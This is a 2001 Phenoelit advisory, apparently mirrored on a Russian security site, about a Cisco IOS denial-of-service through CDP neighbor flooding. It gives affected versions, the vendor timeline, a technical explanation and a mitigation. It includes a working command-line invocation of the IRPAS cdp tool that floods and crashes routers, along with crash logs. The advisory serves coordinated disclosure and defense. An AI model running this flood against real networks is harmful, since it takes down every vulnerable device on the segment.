Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Проблемы с CDP в CISCO (DoS)

  Cisco Systems - Vulnerability in CDP

  Cisco CDP attacks

From:FX <fx_(at)_phenoelit.de>
Date:10.10.2001
Subject:Cisco CDP attacks

Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815++>

[ Authors ]
       FX              <fx@phenoelit.de>
       FtR             <ftr@phenoelit.de>
       kim0            <kim0@phenoelit.de>
       smoovB          <not disclosed>

       Phenoelit Group (http://www.phenoelit.de)

[ Affected Products ]
       Cisco IOS - several versions

       Known vulnerable combinations:
               Cisco 1005      IOS 11.1.*
               Cisco 1603      IOS 11.2, 11.3.11b
               Cisco 2503      IOS 12.0.19
               Cisco 2600      IOS 12.1.?
               Catalyst 2940XL IOS 12.0(5.1)XP

       Known to be not vulnerable:
               Catalyst 5505   CatOS 4.5(1)

       Cisco Bug ID:           CSCdu09909

[ Vendor communication ]
       04/25/2001      Cisco contacted via psirt@cisco.com
       04/25/2001      Damir Rajnovic (gaus@cisco.com) reply
       04/26/2001      Gaus confirmed vulnerability, fix planed
       05/16/2001      Gaus had no feedback from the developers
       06/12/2001      Gaus still left in the cold by his developer
contacts
       06/29/2001      Gaus reports that work on the issue has started but
                       release date is unknown.
       07/03/2001      Cisco expects fix between September and October for
                       the major IOS releases
       09/27/2001      This advisory goes to Cisco for coordination
       10/02/2001      Final coordination response from Gaus
       10/09/2001      Joint release with Cisco Systems (Gaus)

       Phenoelit wants to thank gaus@cisco.com (Damir Rajnovic) for the
       outstanding communication and cooperation.

[ Overview  ]
       Cisco Systems IOS is vulnerable to a denial-of-service attack using
       Cisco's proprietary Cisco Discovery Protocol (CDP).

       When flooded with CDP neighbor announcements, the IOS uses up all
it's
       memory to store the neighbor information. The device is then
unable to
       perform operations that need additional memory such as receiving
       routing updates and accepting inbound telnet(1) connections.

       Some device/IOS combinations tested reboot, others simply stop
       working completely.
       
[ Decription ]
       The Cisco Discovery Protocol is a layer two protocol and therefore
       independent from layer three protocols configured on the device.
       A Cisco device sends out periodic updates out of it's interfaces to
       make itself known to it's neigbors. Since it is a layer two
protocol,
       these packets (frames) are not routed. The updates are send on
       Ethernet to the multicast address 01:00:0C:CC:CC:CC.

       If a Cisco device receives a CDP frame from another device, it
copies
       the contents into internal data structures that can be viewed by
the
       operator using the 'show cdp neighbors' command. The information
       includes the Device ID, capabilities, platform and sender's port
ID.
       The CDP frames also include a hold timer value to tell the neighbor
       when he has to discard the information. The maximum values for this
       timer is 255 seconds (4 minutes, 15 seconds).

       The internal data structure seems to use the remote device ID as
key.
       When receiving two identical but long device IDs, some IOS
versions are
       unable to identify them as identical and stores both of them as
       independent records.

       When flooding a network segment with large CDP frames containing a
       random device ID and comming from a random data link address,
       different IOS versions react differently. The range of possible
       reactions includes:
               + Reboot after 3 to 5 frames are received
               + Completely stop working after some thousands of frames
               + Use all available memory to store CDP neighbor
information
                 until the hold timer expires
       
       While the memory of the device is completely filled with CDP
       information, it is unable to perform other operations that need
       additional memory allocated. This includes accepting dynamic
routing
       updates or new inbound telnet(1) sessions.

       If an operator on the device console tries to debug the CDP traffic
       using the command 'debug cdp packets', all tested devices crashed.

       Interesting is the reaction of the command line 'shell' when
flooding
       the device as seen in the example. At least the help doesn't work
       anymore. It is not known if this behavior can be used for further
       exploitation of the device.

[ Example ]
       To send CDP messages, the cdp sender tool from the Phenoelit IRPAS
       package is used (http://www.phenoelit.de/irpas/). The command line
to
       send maximum sized cdp frames with random data link addresses and
       device names is:

       linuxbox# ./cdp -i eth0 -m0 -n 100000 -l 1480 -r -v

       Be careful when running this! All vulnerable Cisco devices in the
       data link multicast domain will be affected (read: all Ciscos
       connected to your Ethernet hub/switch).


       Reaction of a Cisco 1603 / IOS 11.2(4):

       radio#
       %SYS-2-MALLOCFAIL: Memory allocation of 1480 bytes failed from
       0x81B3BE6, pool Processor, alignment 0
       -Process= "CDP Protocol", ipl= 0, pid= 9
       -Traceback= 80ABDCC 80ACF46 81B3BEE 81B3B72 81B276A 81B224C
       radio#
       %SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from
       0x81B26D2, pool Processor, alignment 0
       -Process= "CDP Protocol", ipl= 0, pid= 9
       -Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
       %SYS-2-MALLOCFAIL: Memory allocation of 96 bytes failed from
       0x81B26D2, pool Processor, alignment 0
       -Process= "CDP Protocol", ipl= 0, pid= 9
       -Traceback= 80ABDCC 80ACF46 81B26DA 81B224C
       radio#sh ?
       % Unrecognized command
       radio#show ?
       % Unrecognized command
       radio#


       Reaction after 'debug cdp packets':

       %Log packet overrun, potential memory corruption, PC 0x81B2720,
format:
       %s
       %Log packet overrun, potential memory corruption, PC 0x81B2720,
format:
       %s
       ....[lots of these].....
       %Log packet overrun, potential memory corruption, PC 0x81B2720,
format:
       %s
       %Log packet overrun, potential memory corruption, PC 0x81B2720,
format:
       %s

       *** BUS ERROR ***
       access address = 0x5f227998
       program counter = 0x80ad45a
       status register = 0x2700
       vbr at time of exception = 0x4000000
       special status word = 0x0045
       faulted cycle was a longword read

       monitor: command "boot" aborted due to exception


       System Bootstrap, Version .....
       Copyright (c) 1994-1996 by cisco Systems, Inc.
       C1600 processor with 2048 Kbytes of main memory

       program load complete, entry point: 0x4018060, size: 0x1da950

[ Solution ]

       Include the command 'no cdp run' in all configurations of Cisco
       devices and update your IOS to a fixed version when these become
       available.

[ end of file ]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru